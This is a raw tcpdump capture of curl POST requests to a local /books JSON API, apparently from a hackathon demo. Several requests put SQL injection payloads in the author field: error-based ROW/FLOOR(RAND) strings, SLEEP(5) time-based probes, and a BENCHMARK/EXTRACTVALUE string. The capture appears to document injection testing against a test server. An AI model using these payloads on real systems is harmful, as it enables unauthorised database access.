20:28:47.549240 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53612 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x958e), seq 973527644, win 43690, options [mss 65476,sackOK,TS val 3147813 ecr 0,nop,wscale 7], length 0
20:28:47.549264 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53612: Flags [S.], cksum 0x0030 (incorrect -> 0xb398), seq 328582650, ack 973527645, win 43690, options [mss 65476,sackOK,TS val 3147813 ecr 3147813,nop,wscale 7], length 0
20:28:47.549278 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53612 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x85ca), seq 1, ack 1, win 342, options [nop,nop,TS val 3147813 ecr 3147813], length 0
20:28:47.549347 IP6 (hlim 64, next-header TCP (6) payload length: 428) ::1.53612 > ::1.8080: Flags [P.], cksum 0x01b4 (incorrect -> 0xa448), seq 1:397, ack 1, win 342, options [nop,nop,TS val 3147813 ecr 3147813], length 396: HTTP, length: 396
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 260
	
	{"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":"9.99"}[!http]
20:28:47.549357 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53612: Flags [.], cksum 0x0028 (incorrect -> 0x8436), seq 1, ack 397, win 350, options [nop,nop,TS val 3147813 ecr 3147813], length 0
20:28:47.553081 IP6 (hlim 64, next-header TCP (6) payload length: 434) ::1.8080 > ::1.53612: Flags [P.], cksum 0x01ba (incorrect -> 0x25b9), seq 1:403, ack 397, win 350, options [nop,nop,TS val 3147817 ecr 3147813], length 402: HTTP, length: 402
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	10b
	{"id":187,"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":9.99}
20:28:47.553100 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53612 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x829c), seq 397, ack 403, win 350, options [nop,nop,TS val 3147817 ecr 3147817], length 0
20:28:47.553398 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53612: Flags [P.], cksum 0x002d (incorrect -> 0x3e75), seq 403:408, ack 397, win 350, options [nop,nop,TS val 3147817 ecr 3147817], length 5: HTTP
20:28:47.553414 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53612 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8297), seq 397, ack 408, win 350, options [nop,nop,TS val 3147817 ecr 3147817], length 0
20:28:47.553620 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53612 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x8296), seq 397, ack 408, win 350, options [nop,nop,TS val 3147817 ecr 3147817], length 0
20:28:47.553882 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53612: Flags [F.], cksum 0x0028 (incorrect -> 0x8294), seq 408, ack 398, win 350, options [nop,nop,TS val 3147818 ecr 3147817], length 0
20:28:47.553901 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53612 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x8293), seq 398, ack 409, win 350, options [nop,nop,TS val 3147818 ecr 3147818], length 0
20:28:47.562559 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53614 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x14a2), seq 1453211298, win 43690, options [mss 65476,sackOK,TS val 3147826 ecr 0,nop,wscale 7], length 0
20:28:47.562583 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53614: Flags [S.], cksum 0x0030 (incorrect -> 0x0e18), seq 849988461, ack 1453211299, win 43690, options [mss 65476,sackOK,TS val 3147826 ecr 3147826,nop,wscale 7], length 0
20:28:47.562607 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53614 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe049), seq 1, ack 1, win 342, options [nop,nop,TS val 3147826 ecr 3147826], length 0
20:28:47.562692 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.53614 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xe3f6), seq 1:197, ack 1, win 342, options [nop,nop,TS val 3147826 ecr 3147826], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo1","author":"Ramesh-P","price":"9.99"}[!http]
20:28:47.562706 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53614: Flags [.], cksum 0x0028 (incorrect -> 0xdf7d), seq 1, ack 197, win 350, options [nop,nop,TS val 3147826 ecr 3147826], length 0
20:28:47.566708 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.53614: Flags [P.], cksum 0x00f2 (incorrect -> 0xf1cc), seq 1:203, ack 197, win 350, options [nop,nop,TS val 3147830 ecr 3147826], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	44
	{"id":188,"name":"Hackathon-Demo1","author":"Ramesh-P","price":9.99}
20:28:47.566737 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53614 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdeab), seq 197, ack 203, win 350, options [nop,nop,TS val 3147830 ecr 3147830], length 0
20:28:47.567200 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53614: Flags [P.], cksum 0x002d (incorrect -> 0x9a83), seq 203:208, ack 197, win 350, options [nop,nop,TS val 3147831 ecr 3147830], length 5: HTTP
20:28:47.567226 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53614 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdea4), seq 197, ack 208, win 350, options [nop,nop,TS val 3147831 ecr 3147831], length 0
20:28:47.567789 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53614 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xdea3), seq 197, ack 208, win 350, options [nop,nop,TS val 3147831 ecr 3147831], length 0
20:28:47.569169 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53614: Flags [F.], cksum 0x0028 (incorrect -> 0xdea0), seq 208, ack 198, win 350, options [nop,nop,TS val 3147833 ecr 3147831], length 0
20:28:47.569189 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53614 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xde9e), seq 198, ack 209, win 350, options [nop,nop,TS val 3147833 ecr 3147833], length 0
20:28:47.578024 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53616 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x9522), seq 777709139, win 43690, options [mss 65476,sackOK,TS val 3147842 ecr 0,nop,wscale 7], length 0
20:28:47.578045 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53616: Flags [S.], cksum 0x0030 (incorrect -> 0x533e), seq 1205989759, ack 777709140, win 43690, options [mss 65476,sackOK,TS val 3147842 ecr 3147842,nop,wscale 7], length 0
20:28:47.578058 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53616 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x2570), seq 1, ack 1, win 342, options [nop,nop,TS val 3147842 ecr 3147842], length 0
20:28:47.578156 IP6 (hlim 64, next-header TCP (6) payload length: 239) ::1.53616 > ::1.8080: Flags [P.], cksum 0x00f7 (incorrect -> 0xcad5), seq 1:208, ack 1, win 342, options [nop,nop,TS val 3147842 ecr 3147842], length 207: HTTP, length: 207
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 72
	
	{"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":"9.99"}[!http]
20:28:47.578172 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53616: Flags [.], cksum 0x0028 (incorrect -> 0x2499), seq 1, ack 208, win 350, options [nop,nop,TS val 3147842 ecr 3147842], length 0
20:28:47.582334 IP6 (hlim 64, next-header TCP (6) payload length: 245) ::1.8080 > ::1.53616: Flags [P.], cksum 0x00fd (incorrect -> 0xc582), seq 1:214, ack 208, win 350, options [nop,nop,TS val 3147846 ecr 3147842], length 213: HTTP, length: 213
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	4f
	{"id":189,"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":9.99}
20:28:47.582354 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53616 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x23bc), seq 208, ack 214, win 350, options [nop,nop,TS val 3147846 ecr 3147846], length 0
20:28:47.582639 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53616: Flags [P.], cksum 0x002d (incorrect -> 0xdf94), seq 214:219, ack 208, win 350, options [nop,nop,TS val 3147846 ecr 3147846], length 5: HTTP
20:28:47.582657 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53616 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x23b7), seq 208, ack 219, win 350, options [nop,nop,TS val 3147846 ecr 3147846], length 0
20:28:47.582944 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53616 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x23b5), seq 208, ack 219, win 350, options [nop,nop,TS val 3147847 ecr 3147846], length 0
20:28:47.583139 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53616: Flags [F.], cksum 0x0028 (incorrect -> 0x23b3), seq 219, ack 209, win 350, options [nop,nop,TS val 3147847 ecr 3147847], length 0
20:28:47.583156 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53616 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x23b3), seq 209, ack 220, win 350, options [nop,nop,TS val 3147847 ecr 3147847], length 0
20:28:47.591903 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53618 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xf3ef), seq 1808353800, win 43690, options [mss 65476,sackOK,TS val 3147855 ecr 0,nop,wscale 7], length 0
20:28:47.591952 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53618: Flags [S.], cksum 0x0030 (incorrect -> 0x97fd), seq 346439356, ack 1808353801, win 43690, options [mss 65476,sackOK,TS val 3147855 ecr 3147855,nop,wscale 7], length 0
20:28:47.591984 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53618 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x6a2e), seq 1, ack 1, win 342, options [nop,nop,TS val 3147856 ecr 3147855], length 0
20:28:47.592069 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.53618 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x6bdb), seq 1:197, ack 1, win 342, options [nop,nop,TS val 3147856 ecr 3147855], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo3","author":"Ramesh-P","price":"9.99"}[!http]
20:28:47.592084 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53618: Flags [.], cksum 0x0028 (incorrect -> 0x6961), seq 1, ack 197, win 350, options [nop,nop,TS val 3147856 ecr 3147856], length 0
20:28:47.594812 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.53618: Flags [P.], cksum 0x00f2 (incorrect -> 0x81b1), seq 1:203, ack 197, win 350, options [nop,nop,TS val 3147858 ecr 3147856], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	44
	{"id":190,"name":"Hackathon-Demo3","author":"Ramesh-P","price":9.99}
20:28:47.594829 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53618 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x6893), seq 197, ack 203, win 350, options [nop,nop,TS val 3147858 ecr 3147858], length 0
20:28:47.595104 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53618: Flags [P.], cksum 0x002d (incorrect -> 0x246b), seq 203:208, ack 197, win 350, options [nop,nop,TS val 3147859 ecr 3147858], length 5: HTTP
20:28:47.595121 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53618 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x688c), seq 197, ack 208, win 350, options [nop,nop,TS val 3147859 ecr 3147859], length 0
20:28:47.595344 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53618 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x688b), seq 197, ack 208, win 350, options [nop,nop,TS val 3147859 ecr 3147859], length 0
20:28:47.595992 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53618: Flags [F.], cksum 0x0028 (incorrect -> 0x6889), seq 208, ack 198, win 350, options [nop,nop,TS val 3147860 ecr 3147859], length 0
20:28:47.596010 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53618 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x6888), seq 198, ack 209, win 350, options [nop,nop,TS val 3147860 ecr 3147860], length 0
20:28:47.605414 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53620 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xf605), seq 3313954340, win 43690, options [mss 65476,sackOK,TS val 3147869 ecr 0,nop,wscale 7], length 0
20:28:47.605447 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53620: Flags [S.], cksum 0x0030 (incorrect -> 0x7546), seq 161574528, ack 3313954341, win 43690, options [mss 65476,sackOK,TS val 3147869 ecr 3147869,nop,wscale 7], length 0
20:28:47.605483 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4778), seq 1, ack 1, win 342, options [nop,nop,TS val 3147869 ecr 3147869], length 0
20:28:47.605616 IP6 (hlim 64, next-header TCP (6) payload length: 240) ::1.53620 > ::1.8080: Flags [P.], cksum 0x00f8 (incorrect -> 0xcfd3), seq 1:209, ack 1, win 342, options [nop,nop,TS val 3147869 ecr 3147869], length 208: HTTP, length: 208
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 73
	
	{"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":"9.99"}[!http]
20:28:47.605639 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53620: Flags [.], cksum 0x0028 (incorrect -> 0x46a0), seq 1, ack 209, win 350, options [nop,nop,TS val 3147869 ecr 3147869], length 0
20:28:47.610236 IP6 (hlim 64, next-header TCP (6) payload length: 246) ::1.8080 > ::1.53620: Flags [P.], cksum 0x00fe (incorrect -> 0xe5a0), seq 1:215, ack 209, win 350, options [nop,nop,TS val 3147874 ecr 3147869], length 214: HTTP, length: 214
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	50
	{"id":191,"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":9.99}
20:28:47.610267 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x45c0), seq 209, ack 215, win 350, options [nop,nop,TS val 3147874 ecr 3147874], length 0
20:28:47.610584 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53620: Flags [P.], cksum 0x002d (incorrect -> 0x0199), seq 215:220, ack 209, win 350, options [nop,nop,TS val 3147874 ecr 3147874], length 5: HTTP
20:28:47.610615 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x45bb), seq 209, ack 220, win 350, options [nop,nop,TS val 3147874 ecr 3147874], length 0
20:28:47.610924 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53620 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x45b9), seq 209, ack 220, win 350, options [nop,nop,TS val 3147875 ecr 3147874], length 0
20:28:47.611804 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53620: Flags [F.], cksum 0x0028 (incorrect -> 0x45b7), seq 220, ack 210, win 350, options [nop,nop,TS val 3147875 ecr 3147875], length 0
20:28:47.611854 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x45b7), seq 210, ack 221, win 350, options [nop,nop,TS val 3147875 ecr 3147875], length 0
20:28:47.621324 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53622 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x4b06), seq 1598553937, win 43690, options [mss 65476,sackOK,TS val 3147885 ecr 0,nop,wscale 7], length 0
20:28:47.621371 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53622: Flags [S.], cksum 0x0030 (incorrect -> 0x7a59), seq 943951803, ack 1598553938, win 43690, options [mss 65476,sackOK,TS val 3147885 ecr 3147885,nop,wscale 7], length 0
20:28:47.621397 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4c8b), seq 1, ack 1, win 342, options [nop,nop,TS val 3147885 ecr 3147885], length 0
20:28:47.621502 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.53622 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x4c38), seq 1:197, ack 1, win 342, options [nop,nop,TS val 3147885 ecr 3147885], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo5","author":"Ramesh-P","price":"9.99"}[!http]
20:28:47.621523 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53622: Flags [.], cksum 0x0028 (incorrect -> 0x4bbf), seq 1, ack 197, win 350, options [nop,nop,TS val 3147885 ecr 3147885], length 0
20:28:47.624338 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.53622: Flags [P.], cksum 0x00f2 (incorrect -> 0x600e), seq 1:203, ack 197, win 350, options [nop,nop,TS val 3147888 ecr 3147885], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	44
	{"id":192,"name":"Hackathon-Demo5","author":"Ramesh-P","price":9.99}
20:28:47.624355 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4aef), seq 197, ack 203, win 350, options [nop,nop,TS val 3147888 ecr 3147888], length 0
20:28:47.624636 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53622: Flags [P.], cksum 0x002d (incorrect -> 0x06c8), seq 203:208, ack 197, win 350, options [nop,nop,TS val 3147888 ecr 3147888], length 5: HTTP
20:28:47.624652 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4aea), seq 197, ack 208, win 350, options [nop,nop,TS val 3147888 ecr 3147888], length 0
20:28:47.624884 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53622 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x4ae8), seq 197, ack 208, win 350, options [nop,nop,TS val 3147889 ecr 3147888], length 0
20:28:47.625094 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53622: Flags [F.], cksum 0x0028 (incorrect -> 0x4ae6), seq 208, ack 198, win 350, options [nop,nop,TS val 3147889 ecr 3147889], length 0
20:28:47.625119 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4ae6), seq 198, ack 209, win 350, options [nop,nop,TS val 3147889 ecr 3147889], length 0
20:28:47.645805 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53624 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xa0c5), seq 3312010070, win 43690, options [mss 65476,sackOK,TS val 3147909 ecr 0,nop,wscale 7], length 0
20:28:47.645853 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53624: Flags [S.], cksum 0x0030 (incorrect -> 0xca78), seq 2041861073, ack 3312010071, win 43690, options [mss 65476,sackOK,TS val 3147910 ecr 3147909,nop,wscale 7], length 0
20:28:47.645885 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x9ca9), seq 1, ack 1, win 342, options [nop,nop,TS val 3147910 ecr 3147910], length 0
20:28:47.645983 IP6 (hlim 64, next-header TCP (6) payload length: 317) ::1.53624 > ::1.8080: Flags [P.], cksum 0x0145 (incorrect -> 0x93c4), seq 1:286, ack 1, win 342, options [nop,nop,TS val 3147910 ecr 3147910], length 285: HTTP, length: 285
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 149
	
	{"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":"9.99"}[!http]
20:28:47.646000 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53624: Flags [.], cksum 0x0028 (incorrect -> 0x9b84), seq 1, ack 286, win 350, options [nop,nop,TS val 3147910 ecr 3147910], length 0
20:28:47.650093 IP6 (hlim 64, next-header TCP (6) payload length: 322) ::1.8080 > ::1.53624: Flags [P.], cksum 0x014a (incorrect -> 0x3baf), seq 1:291, ack 286, win 350, options [nop,nop,TS val 3147914 ecr 3147910], length 290: HTTP, length: 290
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	9c
	{"id":193,"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":9.99}
20:28:47.650115 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x9a5a), seq 286, ack 291, win 350, options [nop,nop,TS val 3147914 ecr 3147914], length 0
20:28:47.650420 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53624: Flags [P.], cksum 0x002d (incorrect -> 0x5633), seq 291:296, ack 286, win 350, options [nop,nop,TS val 3147914 ecr 3147914], length 5: HTTP
20:28:47.650436 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x9a55), seq 286, ack 296, win 350, options [nop,nop,TS val 3147914 ecr 3147914], length 0
20:28:47.650543 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53624 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x9a54), seq 286, ack 296, win 350, options [nop,nop,TS val 3147914 ecr 3147914], length 0
20:28:47.650851 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53624: Flags [F.], cksum 0x0028 (incorrect -> 0x9a53), seq 296, ack 287, win 350, options [nop,nop,TS val 3147914 ecr 3147914], length 0
20:28:47.650870 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x9a52), seq 287, ack 297, win 350, options [nop,nop,TS val 3147915 ecr 3147914], length 0
20:28:47.663181 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53626 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xc5d6), seq 12772056, win 43690, options [mss 65476,sackOK,TS val 3147927 ecr 0,nop,wscale 7], length 0
20:28:47.663206 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53626: Flags [S.], cksum 0x0030 (incorrect -> 0x2a65), seq 3562454594, ack 12772057, win 43690, options [mss 65476,sackOK,TS val 3147927 ecr 3147927,nop,wscale 7], length 0
20:28:47.663224 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xfc96), seq 1, ack 1, win 342, options [nop,nop,TS val 3147927 ecr 3147927], length 0
20:28:47.663305 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.53626 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xfa43), seq 1:197, ack 1, win 342, options [nop,nop,TS val 3147927 ecr 3147927], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo7","author":"Ramesh-P","price":"9.99"}[!http]
20:28:47.663321 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53626: Flags [.], cksum 0x0028 (incorrect -> 0xfbca), seq 1, ack 197, win 350, options [nop,nop,TS val 3147927 ecr 3147927], length 0
20:28:47.666396 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.53626: Flags [P.], cksum 0x00f2 (incorrect -> 0x0c1a), seq 1:203, ack 197, win 350, options [nop,nop,TS val 3147930 ecr 3147927], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	44
	{"id":194,"name":"Hackathon-Demo7","author":"Ramesh-P","price":9.99}
20:28:47.666414 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xfafa), seq 197, ack 203, win 350, options [nop,nop,TS val 3147930 ecr 3147930], length 0
20:28:47.666701 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53626: Flags [P.], cksum 0x002d (incorrect -> 0xb6d3), seq 203:208, ack 197, win 350, options [nop,nop,TS val 3147930 ecr 3147930], length 5: HTTP
20:28:47.666719 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xfaf5), seq 197, ack 208, win 350, options [nop,nop,TS val 3147930 ecr 3147930], length 0
20:28:47.667196 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53626 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xfaf3), seq 197, ack 208, win 350, options [nop,nop,TS val 3147931 ecr 3147930], length 0
20:28:47.667988 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53626: Flags [F.], cksum 0x0028 (incorrect -> 0xfaf0), seq 208, ack 198, win 350, options [nop,nop,TS val 3147932 ecr 3147931], length 0
20:28:47.668008 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xfaef), seq 198, ack 209, win 350, options [nop,nop,TS val 3147932 ecr 3147932], length 0
20:28:47.676577 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53628 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xc764), seq 3196593013, win 43690, options [mss 65476,sackOK,TS val 3147940 ecr 0,nop,wscale 7], length 0
20:28:47.676600 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53628: Flags [S.], cksum 0x0030 (incorrect -> 0x0e71), seq 1553945455, ack 3196593014, win 43690, options [mss 65476,sackOK,TS val 3147940 ecr 3147940,nop,wscale 7], length 0
20:28:47.676620 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe0a2), seq 1, ack 1, win 342, options [nop,nop,TS val 3147940 ecr 3147940], length 0
